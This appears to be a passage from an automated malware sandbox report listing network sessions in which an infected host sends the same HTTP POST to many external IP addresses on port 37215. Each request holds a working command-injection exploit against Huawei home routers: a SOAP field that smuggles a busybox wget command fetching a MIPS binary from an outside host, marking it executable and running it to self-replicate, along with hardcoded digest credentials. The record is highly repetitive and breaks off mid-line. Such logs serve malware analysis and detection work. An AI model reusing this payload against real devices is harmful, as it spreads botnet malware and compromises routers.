                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1091192.168.2.153637861.93.162.7537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.727422953 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1092192.168.2.154351241.26.91.2237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.727441072 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1093192.168.2.1539680197.106.240.24337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.727514982 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1094192.168.2.1541144157.246.169.19537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.727549076 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1095192.168.2.1546492197.157.33.1637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.727648973 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1096192.168.2.1539418197.155.57.837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.727708101 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1097192.168.2.154322241.147.222.10637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.727727890 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1098192.168.2.153491445.194.219.7537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.727749109 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1099192.168.2.1556026197.29.251.23737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.728075981 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1100192.168.2.155085641.241.27.3637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.728151083 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 